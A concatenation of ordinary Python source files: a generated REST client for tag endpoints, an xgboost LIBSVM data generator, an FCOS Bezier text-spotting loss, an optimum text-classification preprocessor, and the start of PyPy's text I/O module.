return self.patch_tag_with_http_info(owner, tag_name, body, **kwargs) # noqa: E501
def patch_tag_with_http_info(self, owner, tag_name, body, **kwargs): # noqa: E501
"""Patch tag # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_tag_with_http_info(owner, tag_name, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str tag_name: Tag name (required)
:param V1Tag body: Tag body (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1Tag, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'tag_name',
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_tag" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `patch_tag`") # noqa: E501
# verify the required parameter 'tag_name' is set
if self.api_client.client_side_validation and ('tag_name' not in local_var_params or # noqa: E501
local_var_params['tag_name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `tag_name` when calling `patch_tag`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `patch_tag`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'tag_name' in local_var_params:
path_params['tag.name'] = local_var_params['tag_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/orgs/{owner}/tags/{tag.name}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Tag', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def sync_tags(self, owner, body, **kwargs): # noqa: E501
"""Sync tags # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.sync_tags(owner, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param V1EntitiesTags body: Data (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.sync_tags_with_http_info(owner, body, **kwargs) # noqa: E501
def sync_tags_with_http_info(self, owner, body, **kwargs): # noqa: E501
"""Sync tags # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.sync_tags_with_http_info(owner, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param V1EntitiesTags body: Data (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method sync_tags" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `sync_tags`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `sync_tags`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/orgs/{owner}/tags/sync', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def update_tag(self, owner, tag_name, body, **kwargs): # noqa: E501
"""Update tag # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_tag(owner, tag_name, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str tag_name: Tag name (required)
:param V1Tag body: Tag body (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1Tag
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.update_tag_with_http_info(owner, tag_name, body, **kwargs) # noqa: E501
def update_tag_with_http_info(self, owner, tag_name, body, **kwargs): # noqa: E501
"""Update tag # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_tag_with_http_info(owner, tag_name, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str tag_name: Tag name (required)
:param V1Tag body: Tag body (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1Tag, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'tag_name',
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method update_tag" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `update_tag`") # noqa: E501
# verify the required parameter 'tag_name' is set
if self.api_client.client_side_validation and ('tag_name' not in local_var_params or # noqa: E501
local_var_params['tag_name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `tag_name` when calling `update_tag`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `update_tag`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'tag_name' in local_var_params:
path_params['tag.name'] = local_var_params['tag_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/orgs/{owner}/tags/{tag.name}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Tag', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
|
tests/benchmark/generate_libsvm.py
|
bclehmann/xgboost
| 23,866 |
66655
|
"""Generate synthetic data in LIBSVM format."""
import argparse
import io
import time
import numpy as np
from sklearn.datasets import make_classification
from sklearn.model_selection import train_test_split
RNG = np.random.RandomState(2019)
def generate_data(args):
"""Generates the data."""
print("Generating dataset: {} rows * {} columns".format(args.rows, args.columns))
print("Sparsity {}".format(args.sparsity))
print("{}/{} train/test split".format(1.0 - args.test_size, args.test_size))
tmp = time.time()
n_informative = args.columns * 7 // 10
n_redundant = args.columns // 10
n_repeated = args.columns // 10
print("n_informative: {}, n_redundant: {}, n_repeated: {}".format(n_informative, n_redundant,
n_repeated))
x, y = make_classification(n_samples=args.rows, n_features=args.columns,
n_informative=n_informative, n_redundant=n_redundant,
n_repeated=n_repeated, shuffle=False, random_state=RNG)
print("Generate Time: {} seconds".format(time.time() - tmp))
tmp = time.time()
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=args.test_size,
random_state=RNG, shuffle=False)
print("Train/Test Split Time: {} seconds".format(time.time() - tmp))
tmp = time.time()
write_file('train.libsvm', x_train, y_train, args.sparsity)
print("Write Train Time: {} seconds".format(time.time() - tmp))
tmp = time.time()
write_file('test.libsvm', x_test, y_test, args.sparsity)
print("Write Test Time: {} seconds".format(time.time() - tmp))
def write_file(filename, x_data, y_data, sparsity):
with open(filename, 'w') as f:
for x, y in zip(x_data, y_data):
write_line(f, x, y, sparsity)
def write_line(f, x, y, sparsity):
with io.StringIO() as line:
line.write(str(y))
for i, col in enumerate(x):
if 0.0 < sparsity < 1.0:
if RNG.uniform(0, 1) > sparsity:
write_feature(line, i, col)
else:
write_feature(line, i, col)
line.write('\n')
f.write(line.getvalue())
def write_feature(line, index, feature):
line.write(' ')
line.write(str(index))
line.write(':')
line.write(str(feature))
def main():
"""The main function.
Defines and parses command line arguments and calls the generator.
"""
parser = argparse.ArgumentParser()
parser.add_argument('--rows', type=int, default=1000000)
parser.add_argument('--columns', type=int, default=50)
parser.add_argument('--sparsity', type=float, default=0.0)
parser.add_argument('--test_size', type=float, default=0.01)
args = parser.parse_args()
generate_data(args)
if __name__ == '__main__':
main()
|
maskrcnn_benchmark/modeling/rpn/fcos/loss.py
|
Yuliang-Liu/bezier_curve_text_spotting
| 423 |
66666
|
"""
This file contains specific functions for computing losses of FCOS
file
"""
import torch
from torch import nn
from torch.nn import functional as F
from maskrcnn_benchmark.layers import IOULoss
from maskrcnn_benchmark.layers import SigmoidFocalLoss
from maskrcnn_benchmark.utils.comm import reduce_sum, get_world_size
from maskrcnn_benchmark.layers import smooth_l1_loss
INF = 100000000
class FCOSLossComputation(object):
"""
This class computes the FCOS losses.
"""
def __init__(self, cfg):
self.cls_loss_func = SigmoidFocalLoss(
cfg.MODEL.FCOS.LOSS_GAMMA,
cfg.MODEL.FCOS.LOSS_ALPHA
)
self.center_sample = cfg.MODEL.FCOS.CENTER_SAMPLE
self.strides = cfg.MODEL.FCOS.FPN_STRIDES
self.radius = cfg.MODEL.FCOS.POS_RADIUS
self.loc_loss_type = cfg.MODEL.FCOS.LOC_LOSS_TYPE
# we make use of IOU Loss for bounding boxes regression,
# but we found that L1 in log scale can yield a similar performance
self.box_reg_loss_func = IOULoss(self.loc_loss_type)
self.centerness_loss_func = nn.BCEWithLogitsLoss(reduction="sum")
# generate sizes of interest
soi = []
prev_size = -1
for s in cfg.MODEL.FCOS.SIZES_OF_INTEREST:
soi.append([prev_size, s])
prev_size = s
soi.append([prev_size, INF])
self.object_sizes_of_interest = soi
def get_sample_region(self, gt, strides, num_points_per, gt_xs, gt_ys, radius=1):
num_gts = gt.shape[0]
K = len(gt_xs)
gt = gt[None].expand(K, num_gts, 4)
center_x = (gt[..., 0] + gt[..., 2]) / 2
center_y = (gt[..., 1] + gt[..., 3]) / 2
center_gt = gt.new_zeros(gt.shape)
# no gt
if center_x[..., 0].sum() == 0:
return gt_xs.new_zeros(gt_xs.shape, dtype=torch.uint8)
beg = 0
for level, n_p in enumerate(num_points_per):
end = beg + n_p
stride = strides[level] * radius
xmin = center_x[beg:end] - stride
ymin = center_y[beg:end] - stride
xmax = center_x[beg:end] + stride
ymax = center_y[beg:end] + stride
# limit sample region in gt
center_gt[beg:end, :, 0] = torch.where(xmin > gt[beg:end, :, 0], xmin, gt[beg:end, :, 0])
center_gt[beg:end, :, 1] = torch.where(ymin > gt[beg:end, :, 1], ymin, gt[beg:end, :, 1])
center_gt[beg:end, :, 2] = torch.where(xmax > gt[beg:end, :, 2], gt[beg:end, :, 2], xmax)
center_gt[beg:end, :, 3] = torch.where(ymax > gt[beg:end, :, 3], gt[beg:end, :, 3], ymax)
beg = end
left = gt_xs[:, None] - center_gt[..., 0]
right = center_gt[..., 2] - gt_xs[:, None]
top = gt_ys[:, None] - center_gt[..., 1]
bottom = center_gt[..., 3] - gt_ys[:, None]
center_bbox = torch.stack((left, top, right, bottom), -1)
inside_gt_bbox_mask = center_bbox.min(-1)[0] > 0
return inside_gt_bbox_mask
def prepare_targets(self, points, targets):
object_sizes_of_interest = self.object_sizes_of_interest
expanded_object_sizes_of_interest = []
for l, points_per_level in enumerate(points):
object_sizes_of_interest_per_level = \
points_per_level.new_tensor(object_sizes_of_interest[l])
expanded_object_sizes_of_interest.append(
object_sizes_of_interest_per_level[None].expand(len(points_per_level), -1)
)
expanded_object_sizes_of_interest = torch.cat(expanded_object_sizes_of_interest, dim=0)
num_points_per_level = [len(points_per_level) for points_per_level in points]
self.num_points_per_level = num_points_per_level
points_all_level = torch.cat(points, dim=0)
labels, reg_targets, bezier_targets = self.compute_targets_for_locations(
points_all_level, targets, expanded_object_sizes_of_interest
)
for i in range(len(labels)):
labels[i] = torch.split(labels[i], num_points_per_level, dim=0)
reg_targets[i] = torch.split(reg_targets[i], num_points_per_level, dim=0)
bezier_targets[i] = torch.split(bezier_targets[i], num_points_per_level, dim=0)
labels_level_first = []
reg_targets_level_first = []
bezier_targets_level_first = []
for level in range(len(points)):
labels_level_first.append(
torch.cat([labels_per_im[level] for labels_per_im in labels], dim=0)
)
# normalize regression targets
reg_targets_level_first.append(
torch.cat([reg_targets_per_im[level]
for reg_targets_per_im in reg_targets],
dim=0) / self.strides[level]
)
bezier_targets_level_first.append(
torch.cat([bezier_targets_per_im[level]
for bezier_targets_per_im in bezier_targets],
dim=0) / self.strides[level]
)
return labels_level_first, reg_targets_level_first, bezier_targets_level_first
def compute_targets_for_locations(self, locations, targets, object_sizes_of_interest):
labels = []
reg_targets = []
bezier_targets = []
xs, ys = locations[:, 0], locations[:, 1]
for im_i in range(len(targets)):
targets_per_im = targets[im_i]
assert targets_per_im.mode == "xyxy"
bboxes = targets_per_im.bbox
labels_per_im = targets_per_im.get_field("labels")
area = targets_per_im.area()
l = xs[:, None] - bboxes[:, 0][None]
t = ys[:, None] - bboxes[:, 1][None]
r = bboxes[:, 2][None] - xs[:, None]
b = bboxes[:, 3][None] - ys[:, None]
reg_targets_per_im = torch.stack([l, t, r, b], dim=2)
# bezier points are relative distances from center to control points
bezier_pts = targets_per_im.get_field("beziers").bbox.view(-1, 8, 2)
y_targets = bezier_pts[:, :, 0][None] - ys[:, None, None]
x_targets = bezier_pts[:, :, 1][None] - xs[:, None, None]
bezier_targets_per_im = torch.stack((y_targets, x_targets), dim=3)
bezier_targets_per_im = bezier_targets_per_im.view(xs.size(0), bboxes.size(0), 16)
if self.center_sample:
is_in_boxes = self.get_sample_region(
bboxes, self.strides, self.num_points_per_level,
xs, ys, radius=self.radius)
else:
is_in_boxes = reg_targets_per_im.min(dim=2)[0] > 0
max_reg_targets_per_im = reg_targets_per_im.max(dim=2)[0]
# limit the regression range for each location
is_cared_in_the_level = \
(max_reg_targets_per_im >= object_sizes_of_interest[:, [0]]) & \
(max_reg_targets_per_im <= object_sizes_of_interest[:, [1]])
locations_to_gt_area = area[None].repeat(len(locations), 1)
locations_to_gt_area[is_in_boxes == 0] = INF
locations_to_gt_area[is_cared_in_the_level == 0] = INF
# if there are still more than one objects for a location,
# we choose the one with minimal area
locations_to_min_aera, locations_to_gt_inds = locations_to_gt_area.min(dim=1)
reg_targets_per_im = reg_targets_per_im[range(len(locations)), locations_to_gt_inds]
bezier_targets_per_im = bezier_targets_per_im[range(len(locations)), locations_to_gt_inds]
labels_per_im = labels_per_im[locations_to_gt_inds]
labels_per_im[locations_to_min_aera == INF] = 0
labels.append(labels_per_im)
reg_targets.append(reg_targets_per_im)
bezier_targets.append(bezier_targets_per_im)
return labels, reg_targets, bezier_targets
def compute_centerness_targets(self, reg_targets):
left_right = reg_targets[:, [0, 2]]
top_bottom = reg_targets[:, [1, 3]]
centerness = (left_right.min(dim=-1)[0] / left_right.max(dim=-1)[0]) * \
(top_bottom.min(dim=-1)[0] / top_bottom.max(dim=-1)[0])
return torch.sqrt(centerness)
def __call__(self, locations, box_cls, box_regression, bezier_regression, centerness, targets):
"""
Arguments:
locations (list[BoxList])
box_cls (list[Tensor])
box_regression (list[Tensor])
centerness (list[Tensor])
targets (list[BoxList])
Returns:
cls_loss (Tensor)
reg_loss (Tensor)
centerness_loss (Tensor)
"""
num_classes = box_cls[0].size(1)
labels, reg_targets, bezier_targets = self.prepare_targets(locations, targets)
box_cls_flatten = []
box_regression_flatten = []
bezier_regression_flatten = []
centerness_flatten = []
labels_flatten = []
reg_targets_flatten = []
bezier_targets_flatten = []
for l in range(len(labels)):
box_cls_flatten.append(box_cls[l].permute(0, 2, 3, 1).reshape(-1, num_classes))
box_regression_flatten.append(box_regression[l].permute(0, 2, 3, 1).reshape(-1, 4))
bezier_regression_flatten.append(bezier_regression[l].permute(0, 2, 3, 1).reshape(-1, 16))
labels_flatten.append(labels[l].reshape(-1))
reg_targets_flatten.append(reg_targets[l].reshape(-1, 4))
bezier_targets_flatten.append(bezier_targets[l].reshape(-1, 16))
centerness_flatten.append(centerness[l].reshape(-1))
box_cls_flatten = torch.cat(box_cls_flatten, dim=0)
box_regression_flatten = torch.cat(box_regression_flatten, dim=0)
bezier_regression_flatten = torch.cat(bezier_regression_flatten, dim=0)
centerness_flatten = torch.cat(centerness_flatten, dim=0)
labels_flatten = torch.cat(labels_flatten, dim=0)
reg_targets_flatten = torch.cat(reg_targets_flatten, dim=0)
bezier_targets_flatten = torch.cat(bezier_targets_flatten, dim=0)
pos_inds = torch.nonzero(labels_flatten > 0).squeeze(1)
num_pos_per_gpu = pos_inds.numel()
num_gpus = get_world_size()
total_num_pos = reduce_sum(pos_inds.new_tensor([num_pos_per_gpu])).item()
box_regression_flatten = box_regression_flatten[pos_inds]
bezier_regression_flatten = bezier_regression_flatten[pos_inds]
reg_targets_flatten = reg_targets_flatten[pos_inds]
bezier_targets_flatten = bezier_targets_flatten[pos_inds]
centerness_flatten = centerness_flatten[pos_inds]
cls_loss = self.cls_loss_func(
box_cls_flatten,
labels_flatten.int()
) / max(total_num_pos / num_gpus, 1.0) # add N to avoid dividing by a zero
if pos_inds.numel() > 0:
centerness_targets = self.compute_centerness_targets(reg_targets_flatten)
sum_centerness_targets = centerness_targets.sum()
sum_centerness_targets = reduce_sum(sum_centerness_targets).item()
reg_loss = self.box_reg_loss_func(
box_regression_flatten,
reg_targets_flatten,
centerness_targets
) / (sum_centerness_targets / num_gpus)
centerness_loss = self.centerness_loss_func(
centerness_flatten,
centerness_targets
) / max(total_num_pos / num_gpus, 1.0)
else:
reg_loss = box_regression_flatten.sum()
bezier_loss = bezier_regression_flatten.sum()
reduce_sum(centerness_flatten.new_tensor([0.0]))
centerness_loss = centerness_flatten.sum()
bezier_loss = F.smooth_l1_loss(
bezier_regression_flatten, bezier_targets_flatten, reduction="none")
bezier_loss = ((bezier_loss.mean(dim=-1) * centerness_targets).sum()
/ (sum_centerness_targets / num_gpus))
return cls_loss, reg_loss, bezier_loss, centerness_loss
def compute_offsets_targets(self, mask_targets, reg_targets):
num_chars = mask_targets.sum(dim=1).long()
N, K = mask_targets.size()
offsets_x = torch.zeros(N, K, dtype=torch.float32, device=mask_targets.device)
offsets_y = torch.zeros(N, K, dtype=torch.float32, device=mask_targets.device)
for i, (nc, reg) in enumerate(zip(num_chars, reg_targets)):
xs = (reg[2] + reg[0]) * (torch.tensor(list(range(nc)),
dtype=torch.float32,
device=mask_targets.device) * 2 + 1) / (nc * 2) - reg[0]
offsets_x[i, :nc] = xs
offsets_y[i, :nc] = (reg[3] - reg[1]) / 2
return torch.stack((offsets_y, offsets_x), dim=2).view(N, -1)
def make_fcos_loss_evaluator(cfg):
loss_evaluator = FCOSLossComputation(cfg)
return loss_evaluator
|
optimum/utils/preprocessing/text_classification.py
|
huggingface/optimum
| 414 |
66675
|
<reponame>huggingface/optimum
from functools import partial
from typing import Dict, List
from datasets import Dataset, Metric, load_dataset
from transformers import PretrainedConfig, PreTrainedTokenizerBase, TextClassificationPipeline
from transformers.pipelines.text_classification import ClassificationFunction
from .base import DatasetProcessing
class TextClassificationProcessing(DatasetProcessing):
def __init__(self, **kwargs):
if "secondary" not in kwargs["data_keys"]:
kwargs["data_keys"]["secondary"] = None
super().__init__(**kwargs)
self.config = kwargs["config"]
self.label_to_id = None
def load_datasets(self):
# Downloading and loading a dataset from the hub.
raw_datasets = load_dataset(path=self.dataset_path, name=self.dataset_name)
max_eval_samples = 100 # TODO remove this
# Labels
if not self.task_args["is_regression"]:
label_list = raw_datasets[self.eval_split].features[self.ref_keys[0]].names
num_labels = len(label_list)
else:
num_labels = 1
if (
self.config.label2id != PretrainedConfig(num_labels=num_labels).label2id
and not self.task_args["is_regression"]
):
# Some have all caps in their config, some don't.
label_name_to_id = {k.lower(): v for k, v in self.config.label2id.items()}
if list(sorted(label_name_to_id.keys())) == list(sorted(label_list)):
self.label_to_id = {i: int(label_name_to_id[label_list[i]]) for i in range(num_labels)}
else:
print(
"Your model seems to have been trained with labels, but they don't match the dataset: ",
f"model labels: {list(sorted(label_name_to_id.keys()))}, dataset labels:"
f" {list(sorted(label_list))}.\nIgnoring the model labels as a result.",
)
# Preprocessing the raw_datasets
def preprocess_function(examples, data_keys: Dict[str, str], tokenizer: PreTrainedTokenizerBase):
# Tokenize the texts
tokenized_inputs = tokenizer(
text=examples[data_keys["primary"]],
text_pair=examples[data_keys["secondary"]] if data_keys["secondary"] else None,
padding="max_length",
max_length=tokenizer.model_max_length,
truncation=True,
)
return tokenized_inputs
eval_dataset = raw_datasets[self.eval_split]
if max_eval_samples is not None:
eval_dataset = eval_dataset.select(range(max_eval_samples))
datasets_dict = {"eval": eval_dataset}
if self.static_quantization:
assert self.calibration_split
# Run the tokenizer on the calibration dataset
calibration_dataset = raw_datasets[self.calibration_split].map(
partial(
preprocess_function,
tokenizer=self.tokenizer,
data_keys=self.data_keys,
),
batched=True,
load_from_cache_file=True,
desc="Running tokenizer on calibration dataset",
)
columns_to_remove = raw_datasets.column_names[self.calibration_split]
columns_to_remove = [name for name in columns_to_remove if name not in self.tokenizer.model_input_names]
calibration_dataset = calibration_dataset.remove_columns(columns_to_remove)
if self.num_calibration_samples is not None:
calibration_dataset = calibration_dataset.select(range(self.num_calibration_samples))
datasets_dict["calibration"] = calibration_dataset
return datasets_dict
def run_inference(self, eval_dataset: Dataset, pipeline: TextClassificationPipeline):
all_labels = []
all_preds = []
for _, inputs in enumerate(eval_dataset):
has_labels = all(inputs.get(k) is not None for k in self.ref_keys)
if has_labels:
labels = tuple(inputs.get(name) for name in self.ref_keys)
if len(labels) == 1:
labels = labels[0]
else:
raise ValueError("Only one label supported.")
else:
raise ValueError("Missing labels")
all_labels.append(labels)
# we manually unroll the pipeline since it is broken
# see https://github.com/huggingface/transformers/issues/17305
if self.data_keys["secondary"]:
inps = [inputs[self.data_keys["primary"]], inputs[self.data_keys["secondary"]]]
else:
inps = inputs[self.data_keys["primary"]]
tokenized_inputs = pipeline.preprocess([inps])
model_outputs = pipeline.forward(tokenized_inputs)
# preds is a dict. No processing function is applied as not needed for score in the regression case
preds = pipeline.postprocess(model_outputs, function_to_apply=ClassificationFunction.NONE)
if not self.task_args["is_regression"]:
# the dataset label ids may be different from the label2id of predictions
if self.label_to_id is not None:
preds = self.config.label2id[preds["label"]]
preds = self.label_to_id[preds]
else:
preds = self.config.label2id[preds["label"]]
else:
preds = preds["score"]
all_preds.append(preds)
return all_labels, all_preds
def get_metrics(self, predictions: List, references: List, metric: Metric):
return metric.compute(predictions=predictions, references=references)
def get_pipeline_kwargs(self):
return {}
|
pypy/module/_io/interp_textio.py
|
m4sterchain/mesapy
| 381 |
66700
|
<gh_stars>100-1000
import sys
from pypy.interpreter.baseobjspace import W_Root
from pypy.interpreter.error import OperationError, oefmt
from pypy.interpreter.gateway import WrappedDefault, interp2app, unwrap_spec
from pypy.interpreter.typedef import (
GetSetProperty, TypeDef, generic_new_descr, interp_attrproperty,
interp_attrproperty_w)
from pypy.module._codecs import interp_codecs
from pypy.module._io.interp_iobase import W_IOBase, convert_size, trap_eintr
from rpython.rlib.rarithmetic import intmask, r_uint, r_ulonglong
from rpython.rlib.rbigint import rbigint
from rpython.rlib.rstring import UnicodeBuilder
STATE_ZERO, STATE_OK, STATE_DETACHED = range(3)
SEEN_CR = 1
SEEN_LF = 2
SEEN_CRLF = 4
SEEN_ALL = SEEN_CR | SEEN_LF | SEEN_CRLF
_WINDOWS = sys.platform == 'win32'
class W_IncrementalNewlineDecoder(W_Root):
seennl = 0
pendingcr = False
w_decoder = None
def __init__(self, space):
self.w_newlines_dict = {
SEEN_CR: space.newunicode(u"\r"),
SEEN_LF: space.newunicode(u"\n"),
SEEN_CRLF: space.newunicode(u"\r\n"),
SEEN_CR | SEEN_LF: space.newtuple(
[space.newunicode(u"\r"), space.newunicode(u"\n")]),
SEEN_CR | SEEN_CRLF: space.newtuple(
[space.newunicode(u"\r"), space.newunicode(u"\r\n")]),
SEEN_LF | SEEN_CRLF: space.newtuple(
[space.newunicode(u"\n"), space.newunicode(u"\r\n")]),
SEEN_CR | SEEN_LF | SEEN_CRLF: space.newtuple(
[space.newunicode(u"\r"), space.newunicode(u"\n"), space.newunicode(u"\r\n")]),
}
@unwrap_spec(translate=int)
def descr_init(self, space, w_decoder, translate, w_errors=None):
self.w_decoder = w_decoder
self.translate = translate
if space.is_none(w_errors):
self.w_errors = space.newtext("strict")
else:
self.w_errors = w_errors
self.seennl = 0
def newlines_get_w(self, space):
return self.w_newlines_dict.get(self.seennl, space.w_None)
@unwrap_spec(final=int)
def decode_w(self, space, w_input, final=False):
if self.w_decoder is None:
raise oefmt(space.w_ValueError,
"IncrementalNewlineDecoder.__init__ not called")
# decode input (with the eventual \r from a previous pass)
if not space.is_w(self.w_decoder, space.w_None):
w_output = space.call_method(self.w_decoder, "decode",
w_input, space.newbool(bool(final)))
else:
w_output = w_input
if not space.isinstance_w(w_output, space.w_unicode):
raise oefmt(space.w_TypeError,
"decoder should return a string result")
output = space.unicode_w(w_output)
output_len = len(output)
if self.pendingcr and (final or output_len):
output = u'\r' + output
self.pendingcr = False
output_len += 1
# retain last \r even when not translating data:
# then readline() is sure to get \r\n in one pass
if not final and output_len > 0:
last = output_len - 1
assert last >= 0
if output[last] == u'\r':
output = output[:last]
self.pendingcr = True
output_len -= 1
if output_len == 0:
return space.newunicode(u"")
# Record which newlines are read and do newline translation if
# desired, all in one pass.
seennl = self.seennl
# If, up to now, newlines are consistently \n, do a quick check
# for the \r
only_lf = False
if seennl == SEEN_LF or seennl == 0:
only_lf = (output.find(u'\r') < 0)
if only_lf:
# If not already seen, quick scan for a possible "\n" character.
# (there's nothing else to be done, even when in translation mode)
if seennl == 0 and output.find(u'\n') >= 0:
seennl |= SEEN_LF
# Finished: we have scanned for newlines, and none of them
# need translating.
elif not self.translate:
i = 0
while i < output_len:
if seennl == SEEN_ALL:
break
c = output[i]
i += 1
if c == u'\n':
seennl |= SEEN_LF
elif c == u'\r':
if i < output_len and output[i] == u'\n':
seennl |= SEEN_CRLF
i += 1
else:
seennl |= SEEN_CR
